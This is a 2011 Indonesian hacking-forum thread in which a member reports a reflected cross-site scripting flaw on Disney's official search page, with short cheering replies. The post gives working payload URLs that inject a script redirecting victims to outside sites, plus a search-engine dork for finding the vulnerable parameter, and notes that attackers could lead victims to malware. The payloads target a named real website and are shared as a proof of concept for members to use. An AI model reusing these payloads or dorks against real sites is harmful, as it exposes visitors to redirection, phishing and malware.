XSS pada situs resmi Walt Disney

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:
Contact poni

XSS pada situs resmi Walt Disney

Post by poni » Mon Nov 07, 2011 6:43 am

Image

Situs resmi Disney rentan terhadap serangan Cross Site Scripting, penyerang dapat mengirimkan redirect link melalui disney.go.com. jika korban klik link tersebut, maka akan diarahkan ke website yang mungkin mengandung malware. lihat demonya dibawah ini.

Code: Select all

http://disney.go.com/search/?q="><script>window.location = "http://www.xcode.or.id/"</script>
http://disney.go.com/search/?q="><script>window.location = "http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/"</script>
Bug XSS pada situs Disney terdeteksi dengan Xcode Xploit Scanner
dork :

Code: Select all

inurl:/search/?q= site:disney.go.com
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
Top
User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:
Contact wiLMaR_kiDz

Re: XSS pada situs resmi Walt Disney

Post by wiLMaR_kiDz » Tue Nov 08, 2011 12:08 am

Hmmm...mulai deh.. 8-)
regards,
ordinary user,-
Top
User avatar
whitehat
Posts: 15
Joined: Thu Jun 16, 2011 12:41 am
Location: surabaya - Bali
Contact:
Contact whitehat

Re: XSS pada situs resmi Walt Disney

Post by whitehat » Fri Nov 11, 2011 12:09 am

asik om tutorialnya......
:lol: :lol:
Top
Post Reply

Return to “Web Hacking”